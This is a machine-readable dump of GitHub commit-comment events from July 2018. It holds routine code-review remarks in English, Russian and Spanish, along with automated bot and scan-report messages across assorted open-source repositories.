{"id":"8046013317","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/miller-feedstock"},"payload":{"comment":{"id":29909706,"position":null,"line":null,"path":null,"commit_id":"cc543f2ef6b9a42decbf7fa10bf17ac0303128f2","created_at":"2018-07-31T18:54:08Z","updated_at":"2018-07-31T18:54:08Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @zachcp was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-31T18:54:08Z"}
{"id":"8046020391","type":"CommitCommentEvent","actor":{"login":"jcaip"},"repo":{"name":"ucla-labx/distbelief"},"payload":{"comment":{"id":29909723,"position":42,"line":43,"path":"distbelief/server.py","commit_id":"0f94d8a1b9ec357b5c6c70b90173ad43f20760ed","created_at":"2018-07-31T18:55:31Z","updated_at":"2018-07-31T18:55:31Z","author_association":"COLLABORATOR","body":"I don't think this is going to work because the model in the server won't have the gradients in `param.grad`"}},"created_at":"2018-07-31T18:55:31Z"}
{"id":"8046021499","type":"CommitCommentEvent","actor":{"login":"sparklingrobots"},"repo":{"name":"sparklingrobots/pantheon-d8-composer-project-tk"},"payload":{"comment":{"id":29909726,"position":null,"line":null,"path":null,"commit_id":"0debe2297976539381b6a85f4155b06539dbf2f7","created_at":"2018-07-31T18:55:43Z","updated_at":"2018-07-31T18:55:43Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-tk#ci-18](https://dashboard.pantheon.io/sites/399aa65a-6e55-43fc-bc1a-072c581bc68c#ci-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-18-pantheon-d8-composer-project-tk.pantheonsite.io/)"}},"created_at":"2018-07-31T18:55:43Z"}
{"id":"8046025355","type":"CommitCommentEvent","actor":{"login":"checkmarxQA"},"repo":{"name":"checkmarxQA/CxRepository"},"payload":{"comment":{"id":29909738,"position":null,"line":null,"path":null,"commit_id":"a23cad998261c81bf63aa21ac681a2e8b5303e7c","created_at":"2018-07-31T18:56:25Z","updated_at":"2018-07-31T18:56:25Z","author_association":"OWNER","body":"Checkmarx scan results 31 Jul 2018 21:56 UTC +03:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://2016CITEMPLATE/CxWebClient/ViewerMain.aspx?scanid=1010011&projectid=10012\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/checkmarxQA/CxRepository/commit/a23cad998261c81bf63aa21ac681a2e8b5303e7c\">a23cad998261c81bf63aa21ac681a2e8b5303e7c</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2018-07-31T18:56:25Z"}
{"id":"8046027506","type":"CommitCommentEvent","actor":{"login":"cburgdorf"},"repo":{"name":"cburgdorf/py-evm"},"payload":{"comment":{"id":29909742,"position":16,"line":188,"path":"eth/vm/logic/arithmetic.py","commit_id":"46f7a9d9a38318c484cb14dd80a66aba766c0186","created_at":"2018-07-31T18:56:50Z","updated_at":"2018-07-31T18:56:50Z","author_association":"OWNER","body":"That doesn't cut it. That will return `0` in this case. But we want the following as defined in the EIP.\r\n```\r\n115792089237316195423570985008687907853269984665640564039457584007913129639934\r\n                                                                             ^\r\n```\r\n\r\nHowever, this one seems do do the trick https://github.com/cburgdorf/py-evm/pull/1#discussion_r206638427\r\n\r\n```\r\n(value << shift_length) & constants.UINT_256_MAX\r\n```"}},"created_at":"2018-07-31T18:56:50Z"}
{"id":"8046027658","type":"CommitCommentEvent","actor":{"login":"gkao123"},"repo":{"name":"gkao123/tbd"},"payload":{"comment":{"id":29909743,"position":null,"line":null,"path":null,"commit_id":"45c5876a2886d709d05fb9d2d21311aa3e4f7876","created_at":"2018-07-31T18:56:52Z","updated_at":"2018-07-31T18:56:52Z","author_association":"OWNER","body":"Added global variable - basedDir"}},"created_at":"2018-07-31T18:56:52Z"}
{"id":"8046028863","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29909745,"position":18,"line":19,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/wagon.rb","commit_id":"5b6fc488ad6655b432926d822580934bb8599c32","created_at":"2018-07-31T18:57:06Z","updated_at":"2018-07-31T18:57:06Z","author_association":"NONE","body":"Сейчас у тебя в этой проверке никак не учитывается аргумент, который передается методу. Этот метод загружает вагон каким-то объемом (volume). Когда будет ошибка? Когда сумма добавляемого объема (volume) и объема, который уже занят (taken_volume) превысит общую вместительность (total_volume). И кстати, правильней было бы переименовать эти переменные имено в такие названия. А то сейчас \"общее число\" и \"занятое число\""}},"created_at":"2018-07-31T18:57:06Z"}
{"id":"8046034552","type":"CommitCommentEvent","actor":{"login":"azat"},"repo":{"name":"azat/libevent"},"payload":{"comment":{"id":29909768,"position":null,"line":null,"path":null,"commit_id":"6efaf10d8548cc3a4ac23b587209cac2b33ae32f","created_at":"2018-07-31T18:58:10Z","updated_at":"2018-07-31T18:58:10Z","author_association":"OWNER","body":"> This looks good.  I assume it works (I don't know much about `cmake`).  Is it going to be merged?\n\nSorry for the delay (had been on vacation, had a lot of work to do).\n\nAnyway, sure it will be merged. I'm going to take a look at this and\nrelative patches *today*.\n"}},"created_at":"2018-07-31T18:58:10Z"}
{"id":"8046034667","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29909769,"position":16,"line":14,"path":"parser.py","commit_id":"3b6adcf7e20acd8e1b0f8e14b5a6a75a50a9bf85","created_at":"2018-07-31T18:58:11Z","updated_at":"2018-07-31T18:58:11Z","author_association":"NONE","body":"Ну блина, что за говнострочка. Разбей на переменные, сам же написал, что невозможно читать..."}},"created_at":"2018-07-31T18:58:11Z"}
{"id":"8046035820","type":"CommitCommentEvent","actor":{"login":"ramya-rao-a"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29909771,"position":7,"line":381,"path":"src/vs/workbench/browser/parts/views/viewsViewlet.ts","commit_id":"500a35cfdbebc811fd224e4dcb6f1a25c0c142ed","created_at":"2018-07-31T18:58:23Z","updated_at":"2018-07-31T18:58:23Z","author_association":"MEMBER","body":"@sandy081 fyi"}},"created_at":"2018-07-31T18:58:23Z"}
{"id":"8046042840","type":"CommitCommentEvent","actor":{"login":"dnoe"},"repo":{"name":"envoyproxy/envoy"},"payload":{"comment":{"id":29909790,"position":4,"line":52,"path":"test/common/network/addr_family_aware_socket_option_impl_test.cc","commit_id":"b27068bd065a83f9c106a08d3fa66a19593ce321","created_at":"2018-07-31T18:59:38Z","updated_at":"2018-07-31T18:59:38Z","author_association":"CONTRIBUTOR","body":"Answering my own question. We are internally overriding isFamilySupported with some dark, evil magic that doesn't really do anything. So your changes above are not reflected, and the expectation isn't met. I will fix internally - all of your PR looks good :)"}},"created_at":"2018-07-31T18:59:38Z"}
{"id":"8046043422","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29909792,"position":null,"line":null,"path":null,"commit_id":"1de66a1065674c9321bc02be2dd62f9250945613","created_at":"2018-07-31T18:59:44Z","updated_at":"2018-07-31T18:59:44Z","author_association":"NONE","body":"```ruby\r\n  def delete_wagon\r\n    @wagons -= 1 unless @wagons < 1 || @speed > 0\r\n  end\r\n```\r\nусловие лучше переписать в виде `if @wagons > 0 && @speed == 0`\r\nэта запись легче воспринимается при чтении и больше \"стыкуется с логикой проверки\"\r\nмы ведь хотим узнать \"есть ли вагоны?\" и \"стоит ли поезд?\"\r\nа ваша проверка функционально делает то же, но \"дальше от сути\"\r\nпоэтому читать и понимать ее сложнее"}},"created_at":"2018-07-31T18:59:44Z"}
{"id":"8046043884","type":"CommitCommentEvent","actor":{"login":"yurem"},"repo":{"name":"GluuFederation/oxAuth"},"payload":{"comment":{"id":29909795,"position":null,"line":null,"path":null,"commit_id":"7227a9b0ab8adc829c0f84ac68e307c5687fb67e","created_at":"2018-07-31T18:59:49Z","updated_at":"2018-07-31T18:59:49Z","author_association":"CONTRIBUTOR","body":"I offer to protect TS ApiKey because we store it in LDAP as plain text value.\r\nYou can use /opt/gluu/bin/encode.py to encrypt it. After that we need to add code like this:\r\n```\r\n            p12_passowrd = ios_creds[\"p12_password\"]\r\n\r\n            try:\r\n                encryptionService = CdiUtil.bean(EncryptionService)\r\n                p12_passowrd = encryptionService.decrypt(p12_passowrd)\r\n            except:\r\n                # Ignore exception. Password is not encrypted\r\n                print \"Super-Gluu. Initialize native notification services. Assuming that 'p12_passowrd' password in not encrypted\"\r\n```"}},"created_at":"2018-07-31T18:59:49Z"}
{"id":"8046045071","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/conda-smithy-feedstock"},"payload":{"comment":{"id":29909796,"position":null,"line":null,"path":null,"commit_id":"8b6d6a39f5a1f82b6bf210ecb6e87c58200761bb","created_at":"2018-07-31T19:00:01Z","updated_at":"2018-07-31T19:00:01Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @isuruf-bot was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-31T19:00:01Z"}
{"id":"8046046251","type":"CommitCommentEvent","actor":{"login":"FlyingPikachu"},"repo":{"name":"FlyingPikachu/Quests"},"payload":{"comment":{"id":29909800,"position":null,"line":null,"path":null,"commit_id":"9dd183838935fc0e6563fb8faa0d544c0017c8a0","created_at":"2018-07-31T19:00:13Z","updated_at":"2018-07-31T19:00:13Z","author_association":"OWNER","body":"Working with the people hosting the Jenkins server to get it pushing builds again. Try the commit I just pushed, should compile now. Will look into the permissions thing shortly."}},"created_at":"2018-07-31T19:00:13Z"}
{"id":"8046046370","type":"CommitCommentEvent","actor":{"login":"Pomax"},"repo":{"name":"Pomax/processing-bezier-master"},"payload":{"comment":{"id":29909801,"position":null,"line":null,"path":null,"commit_id":"0f8b5c64fa20cd7fefa859ed9f38f8dc48aab68c","created_at":"2018-07-31T19:00:14Z","updated_at":"2018-07-31T19:00:14Z","author_association":"OWNER","body":"Updated - I don't supposed you'd be interested in have a look at the PointVector.project/2 function for working in both a dynamic phi (already in) and a dynamic rho for rotating about the \"y axis\"? (rotation about a vector isn't super hard, but if you know of a nice trick to simplify it, I'm all eyes =)"}},"created_at":"2018-07-31T19:00:14Z"}
{"id":"8046048689","type":"CommitCommentEvent","actor":{"login":"jackmcdade"},"repo":{"name":"statamic/awesome"},"payload":{"comment":{"id":29909814,"position":null,"line":null,"path":null,"commit_id":"1dc7abad1ca078eef170e3617b84957a4f20258e","created_at":"2018-07-31T19:00:37Z","updated_at":"2018-07-31T19:00:37Z","author_association":"MEMBER","body":"That was my chance to demonstrate my knowledge of the difference between `change` and `chance`."}},"created_at":"2018-07-31T19:00:37Z"}
{"id":"8046050944","type":"CommitCommentEvent","actor":{"login":"avil13"},"repo":{"name":"avil13/vue-sweetalert2"},"payload":{"comment":{"id":29909818,"position":13,"line":12,"path":"src/index.js","commit_id":"23c09927110939ce3a6d17cbcfc0e8115707a32d","created_at":"2018-07-31T19:01:03Z","updated_at":"2018-07-31T19:01:03Z","author_association":"OWNER","body":"I need an example to discuss it. In my project using nuxt I had no problems. But you need more examples for testing"}},"created_at":"2018-07-31T19:01:03Z"}
{"id":"8046057449","type":"CommitCommentEvent","actor":{"login":"johnarleycano"},"repo":{"name":"johnarleycano/incidentes"},"payload":{"comment":{"id":29909829,"position":null,"line":null,"path":null,"commit_id":"fc95cf42da97ff067b87633b1dbd023fce813a4d","created_at":"2018-07-31T19:02:16Z","updated_at":"2018-07-31T19:02:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[Incidentes] style(General): ordenar los registros de las listas desplegables de manera alfabética](https://trello.com/c/a2z1uKg9/29-incidentes-stylegeneral-ordenar-los-registros-de-las-listas-desplegables-de-manera-alfab%C3%A9tica)"}},"created_at":"2018-07-31T19:02:16Z"}
{"id":"8046061426","type":"CommitCommentEvent","actor":{"login":"Fokko"},"repo":{"name":"apache/incubator-airflow"},"payload":{"comment":{"id":29909845,"position":4,"line":437,"path":"airflow/config_templates/default_airflow.cfg","commit_id":"233056e0ddcaf3033e95881d5c7a26fc35fa408f","created_at":"2018-07-31T19:03:04Z","updated_at":"2018-07-31T19:03:04Z","author_association":"CONTRIBUTOR","body":"It will scan the whole folder, so both new and updated files. Renaming the variable is a bit more difficult since it will break backward compatibility with the current configs."}},"created_at":"2018-07-31T19:03:04Z"}
{"id":"8046061450","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29909846,"position":23,"line":24,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/wagon.rb","commit_id":"5b6fc488ad6655b432926d822580934bb8599c32","created_at":"2018-07-31T19:03:04Z","updated_at":"2018-07-31T19:03:04Z","author_association":"NONE","body":"А так подожди. Это у тебя метод, который возвращает сколько свободного места осталось. Прости, запутал тебя в прошлый раз значит. Думал, что это метод освобождающий место в вагоне. Да, тут нужна только 25 строка."}},"created_at":"2018-07-31T19:03:04Z"}
{"id":"8046064856","type":"CommitCommentEvent","actor":{"login":"Colima-97"},"repo":{"name":"Colima-97/TSO_APP"},"payload":{"comment":{"id":29909855,"position":9,"line":72,"path":"app/src/main/java/cry/who/boy/tso_app/MainActivity.java","commit_id":"000faaee25677fa68245fbb04291436a3abb6c85","created_at":"2018-07-31T19:03:44Z","updated_at":"2018-07-31T19:03:44Z","author_association":"OWNER","body":"Cambiar UserDatos.java por GroupActivity.java"}},"created_at":"2018-07-31T19:03:44Z"}
{"id":"8046065315","type":"CommitCommentEvent","actor":{"login":"Colima-97"},"repo":{"name":"Colima-97/TSO_APP"},"payload":{"comment":{"id":29909858,"position":null,"line":null,"path":null,"commit_id":"000faaee25677fa68245fbb04291436a3abb6c85","created_at":"2018-07-31T19:03:49Z","updated_at":"2018-07-31T19:03:49Z","author_association":"OWNER","body":"Problema solucionado. El código funcionó."}},"created_at":"2018-07-31T19:03:49Z"}
{"id":"8046066925","type":"CommitCommentEvent","actor":{"login":"mk1x86"},"repo":{"name":"Acknex/LotterShock"},"payload":{"comment":{"id":29909863,"position":null,"line":null,"path":null,"commit_id":"ecd2318eb2ba94d6c5b7cb449da4d076c6507028","created_at":"2018-07-31T19:04:08Z","updated_at":"2018-07-31T19:04:08Z","author_association":"CONTRIBUTOR","body":"Hahaha, finally"}},"created_at":"2018-07-31T19:04:08Z"}
{"id":"8046067907","type":"CommitCommentEvent","actor":{"login":"barabas6river"},"repo":{"name":"6RiverSystems/realsense"},"payload":{"comment":{"id":29909868,"position":123,"line":121,"path":"realsense2_camera/src/realsense_node_factory.cpp","commit_id":"348e2c2a1e8094e37083af385272c694cd35671e","created_at":"2018-07-31T19:04:18Z","updated_at":"2018-07-31T19:04:18Z","author_association":"NONE","body":"Is there a way to poll for device, or get notified when it comes back?"}},"created_at":"2018-07-31T19:04:18Z"}
{"id":"8046070668","type":"CommitCommentEvent","actor":{"login":"kbhawkey"},"repo":{"name":"kubernetes/website"},"payload":{"comment":{"id":29909873,"position":7,"line":7,"path":"content/en/docs/reference/glossary/flexvolume.md","commit_id":"4cddc45ab778a32adbe6d976615ee08d53ab1c7d","created_at":"2018-07-31T19:04:50Z","updated_at":"2018-07-31T19:04:50Z","author_association":"CONTRIBUTOR","body":"Is the term FlexVolume or Flexvolume? I have seen both in a number of places in the documentation."}},"created_at":"2018-07-31T19:04:50Z"}
{"id":"8046076556","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29909894,"position":16,"line":14,"path":"parser.py","commit_id":"3b6adcf7e20acd8e1b0f8e14b5a6a75a50a9bf85","created_at":"2018-07-31T19:06:03Z","updated_at":"2018-07-31T19:06:03Z","author_association":"NONE","body":"Или ты строчки экономишь? И что за способ доставать данные? Зачем так извращаться, там же структура проще некуда...\r\n\r\n```py\r\nresponse = requests.get(self.__url).text\r\njson = json.loads(response)\r\nreturn json['days']\r\n```"}},"created_at":"2018-07-31T19:06:03Z"}
{"id":"8046077469","type":"CommitCommentEvent","actor":{"login":"wsnipex"},"repo":{"name":"wsnipex/xbmc"},"payload":{"comment":{"id":29909898,"position":20,"line":80,"path":"cmake/modules/FindFlatBuffers.cmake","commit_id":"46527b86db329fdae03607960fa9b8def3b98df7","created_at":"2018-07-31T19:06:14Z","updated_at":"2018-07-31T19:06:14Z","author_association":"OWNER","body":"I don't see how the location of the headers makes a difference, unless you plan to name them exactly the same.\r\nIt'd be much easier to just put all generated messages headers in a single dir.\r\nIf you insist on diffferent locations in the future, it can still be improved when actually needed, since currently I only see this single one used."}},"created_at":"2018-07-31T19:06:14Z"}
{"id":"8046077385","type":"CommitCommentEvent","actor":{"login":"kbhawkey"},"repo":{"name":"kubernetes/website"},"payload":{"comment":{"id":29909897,"position":20,"line":20,"path":"content/en/docs/reference/glossary/flexvolume.md","commit_id":"4cddc45ab778a32adbe6d976615ee08d53ab1c7d","created_at":"2018-07-31T19:06:13Z","updated_at":"2018-07-31T19:06:13Z","author_association":"CONTRIBUTOR","body":"Can you use one link to the concepts/storage/volumes/#flexvolume page instead of three links? I think two of the links can be found from the first link."}},"created_at":"2018-07-31T19:06:13Z"}
{"id":"8046077663","type":"CommitCommentEvent","actor":{"login":"calebboyd"},"repo":{"name":"nexe/nexe"},"payload":{"comment":{"id":29909899,"position":null,"line":null,"path":null,"commit_id":"a40d697542244c0938d226e07aba112ed99d8010","created_at":"2018-07-31T19:06:16Z","updated_at":"2018-07-31T19:06:16Z","author_association":"MEMBER","body":"This would've been a great PR!"}},"created_at":"2018-07-31T19:06:16Z"}
{"id":"8046084565","type":"CommitCommentEvent","actor":{"login":"JeroenBoersma"},"repo":{"name":"mmswebinternet/docker-compose-development"},"payload":{"comment":{"id":29909920,"position":3,"line":3,"path":"conf.d/mysql/my.cnf","commit_id":"0393a9d96bc8efc0aa70eaff11ba0ab962f79a2e","created_at":"2018-07-31T19:07:39Z","updated_at":"2018-07-31T19:07:39Z","author_association":"NONE","body":"will copy this to mainstream\r\n"}},"created_at":"2018-07-31T19:07:39Z"}
{"id":"8046085975","type":"CommitCommentEvent","actor":{"login":"mphelp"},"repo":{"name":"Porogram/Porogram"},"payload":{"comment":{"id":29909926,"position":null,"line":null,"path":null,"commit_id":"ef318068748d85a19db7975b473e6398c09abf88","created_at":"2018-07-31T19:07:56Z","updated_at":"2018-07-31T19:07:56Z","author_association":"COLLABORATOR","body":"maybe it'll work"}},"created_at":"2018-07-31T19:07:56Z"}
{"id":"8046086264","type":"CommitCommentEvent","actor":{"login":"sparklingrobots"},"repo":{"name":"sparklingrobots/pantheon-d8-composer-project-tk"},"payload":{"comment":{"id":29909928,"position":null,"line":null,"path":null,"commit_id":"0debe2297976539381b6a85f4155b06539dbf2f7","created_at":"2018-07-31T19:07:59Z","updated_at":"2018-07-31T19:07:59Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-tk#ci-19](https://dashboard.pantheon.io/sites/399aa65a-6e55-43fc-bc1a-072c581bc68c#ci-19).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-19-pantheon-d8-composer-project-tk.pantheonsite.io/)"}},"created_at":"2018-07-31T19:07:59Z"}
{"id":"8046089477","type":"CommitCommentEvent","actor":{"login":"erikswed"},"repo":{"name":"erikswed/android-PlacesAutocompleteTextView"},"payload":{"comment":{"id":29909938,"position":20,"line":102,"path":"demo-app/src/main/java/com/seatgeek/placesautocompletedemo/PlacesAutocompleteActivity.java","commit_id":"d8380373814f2061aca6ff54eeda408ce474453b","created_at":"2018-07-31T19:08:38Z","updated_at":"2018-07-31T19:08:38Z","author_association":"OWNER","body":"If you read the documentation for the places autocomplete api, there are ways to restrict results to a particular location and radius or, alternatively, to within a country:. This my code show how to restrict to a country(s). Read the docs especially about radius, if you know the radius of the city you can limit to that city..\r\nread:\r\nhttps://developers.google.com/places/web-service/autocomplete"}},"created_at":"2018-07-31T19:08:38Z"}
{"id":"8046091066","type":"CommitCommentEvent","actor":{"login":"alanconway"},"repo":{"name":"alanconway/qpid-proton"},"payload":{"comment":{"id":29909943,"position":11,"line":11,"path":"docs/connect_configuation.md","commit_id":"c30911617e39e8dbcb71a501b9deb5ff988f687d","created_at":"2018-07-31T19:08:57Z","updated_at":"2018-07-31T19:08:57Z","author_association":"OWNER","body":"All our projects (qpidd, dispatch) install their /etc/ stuff in to PREFIX/etc and read from there unless the install prefix is /usr, in which case they go for /etc. E.g. dispatch:\r\n\r\n# define the configuration directory based on whether or not the install prefix is defined\r\nif(NOT DEFINED SYSCONF_INSTALL_DIR)\r\n    if(CMAKE_INSTALL_PREFIX STREQUAL \"/usr\")\r\n        set(SYSCONF_INSTALL_DIR \"/etc\")\r\n    else()\r\n        set(SYSCONF_INSTALL_DIR \"${CMAKE_INSTALL_PREFIX}/etc\")\r\n    endif()\r\nendif()\r\n\r\nWe could make that the behavior for the connect file, or we could ignore the prefix and only check /etc - but it seems like checking both obeys the law of least surprise. E.g. if you install proton and dispatch in /usr/local it would be surprising that dispatch looks in /usr/local/etc/ but proton looks in /etc. But if you don't know or care how proton was installed it would be nice if /etc always worked."}},"created_at":"2018-07-31T19:08:57Z"}
{"id":"8046091476","type":"CommitCommentEvent","actor":{"login":"alanconway"},"repo":{"name":"alanconway/qpid-proton"},"payload":{"comment":{"id":29909944,"position":16,"line":16,"path":"docs/connect_configuation.md","commit_id":"c30911617e39e8dbcb71a501b9deb5ff988f687d","created_at":"2018-07-31T19:09:01Z","updated_at":"2018-07-31T19:09:01Z","author_association":"OWNER","body":"If we go beyond generic AMQP we'll have to extend our entire config schema, add new properties, support new URL schemes etc. etc. If we really plan on that we might want to give more thought to extensibility, e.g. the flat namespace is maybe not such an extensible idea if we want to support other security mechs in future. Maybe we should have:\r\nsasl: { mechanisms: foo, allow_insecure: ... }\r\ntls: { certificate: x, ca_certificate: y, verify_hostname: true ... }\r\nAnd in particular if we ever do need AMQP properties (frame-size blah blah)\r\namqp: {frame-size:, channel-max: ...}\r\n\r\nIn  other words: only  properties that are part of a connection URL should be named at the top level if we want to allow connections on other protocols in future."}},"created_at":"2018-07-31T19:09:01Z"}
{"id":"8046092225","type":"CommitCommentEvent","actor":{"login":"alanconway"},"repo":{"name":"alanconway/qpid-proton"},"payload":{"comment":{"id":29909949,"position":9,"line":9,"path":"docs/connect_configuation.md","commit_id":"c30911617e39e8dbcb71a501b9deb5ff988f687d","created_at":"2018-07-31T19:09:10Z","updated_at":"2018-07-31T19:09:10Z","author_association":"OWNER","body":"Fixed to follow python"}},"created_at":"2018-07-31T19:09:10Z"}
{"id":"8046092367","type":"CommitCommentEvent","actor":{"login":"alanconway"},"repo":{"name":"alanconway/qpid-proton"},"payload":{"comment":{"id":29909950,"position":10,"line":10,"path":"docs/connect_configuation.md","commit_id":"c30911617e39e8dbcb71a501b9deb5ff988f687d","created_at":"2018-07-31T19:09:12Z","updated_at":"2018-07-31T19:09:12Z","author_association":"OWNER","body":"Fixed to follow python"}},"created_at":"2018-07-31T19:09:12Z"}
{"id":"8046093561","type":"CommitCommentEvent","actor":{"login":"alanconway"},"repo":{"name":"alanconway/qpid-proton"},"payload":{"comment":{"id":29909954,"position":8,"line":8,"path":"docs/connect_configuation.md","commit_id":"c30911617e39e8dbcb71a501b9deb5ff988f687d","created_at":"2018-07-31T19:09:26Z","updated_at":"2018-07-31T19:09:26Z","author_association":"OWNER","body":"Fixed to follow python\r\n"}},"created_at":"2018-07-31T19:09:26Z"}
{"id":"8046094450","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"Spectra456/Schedule"},"payload":{"comment":{"id":29909957,"position":1,"line":6,"path":"parser.py","commit_id":"3b6adcf7e20acd8e1b0f8e14b5a6a75a50a9bf85","created_at":"2018-07-31T19:09:37Z","updated_at":"2018-07-31T19:09:37Z","author_association":"NONE","body":"Зачем передавать url, когда он у тебя никогда не меняется. Меняется только дата начала недели (get параметр запроса), его было бы неплохо вынести в параметр функций `getWeekSchedule` и др. А url добавить как поле класса."}},"created_at":"2018-07-31T19:09:37Z"}
{"id":"8046095295","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29909960,"position":null,"line":null,"path":null,"commit_id":"1de66a1065674c9321bc02be2dd62f9250945613","created_at":"2018-07-31T19:09:47Z","updated_at":"2018-07-31T19:09:47Z","author_association":"NONE","body":"```ruby\r\n  def new_speed(new_value)\r\n    if new_value > 0   # специально использую условный оператор . чтобы задать скорость\r\n      @speed = new_value\r\n    else\r\n      @speed = 0\r\n    end\r\n  end\r\n```\r\nв ТЗ: \"Может набирать скорость\"\r\nздесь у вас как бы не очень правильная реализация\r\nваш метод \"устанавливает значение скорости\", есть фильтр только на отрицательную велчину, но по сути любое положительное значение будет присвоено\r\nа ТЗ подразумевает метод, который будет помогать поезду \"набирать скорость\"\r\nбудет более правильно, если полученное значение будет не записываться в `@speed`, а добавляться к этой величине\r\n\r\nи далее:\r\n\r\n```ruby\r\n  def stop # Может тормозить (сбрасывать скорость до нуля)\r\n    @speed = 0\r\n  end\r\n```\r\nопасаюсь снова вызвать ваше недовольство \"неточностью формулировок\" задания, но все же напишу этот комментарий ))\r\n\r\nв задании: \"Может тормозить (сбрасывать скорость до нуля)\"\r\n\r\nметод реализован в виде стопкрана, т.е. скорость сразу сбрасывается до нуля\r\n(в задании возможно не очень ясная формулировка, но она означает, что поезд может тормозить и это не обязательно должно быть полное торможение, фраза же \"сбрасывать скорость до нуля\" означает, \"обратите внимание! скорость не должна быть меньше нуля\" :) )\r\n\r\nлучше, чтобы метод принимал значение\r\nаналогично методу \"увеличить скорость\", но теперь уже значение должно вычитаться, если следовать логике ТЗ"}},"created_at":"2018-07-31T19:09:47Z"}
{"id":"8046098401","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29909966,"position":null,"line":null,"path":null,"commit_id":"5b8aecd98baf72f17a0593b89af90f59513734bc","created_at":"2018-07-31T19:10:23Z","updated_at":"2018-07-31T19:10:23Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-62](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-62).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-62-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-31T19:10:23Z"}
{"id":"8046099520","type":"CommitCommentEvent","actor":{"login":"barabas6river"},"repo":{"name":"6RiverSystems/realsense"},"payload":{"comment":{"id":29909971,"position":265,"line":337,"path":"realsense2_camera/src/realsense_node_factory.cpp","commit_id":"348e2c2a1e8094e37083af385272c694cd35671e","created_at":"2018-07-31T19:10:37Z","updated_at":"2018-07-31T19:10:37Z","author_association":"NONE","body":"Here we only sleep for 5 seconds after reset, but we sleep for 10 above. Is there a reason for the difference?"}},"created_at":"2018-07-31T19:10:37Z"}
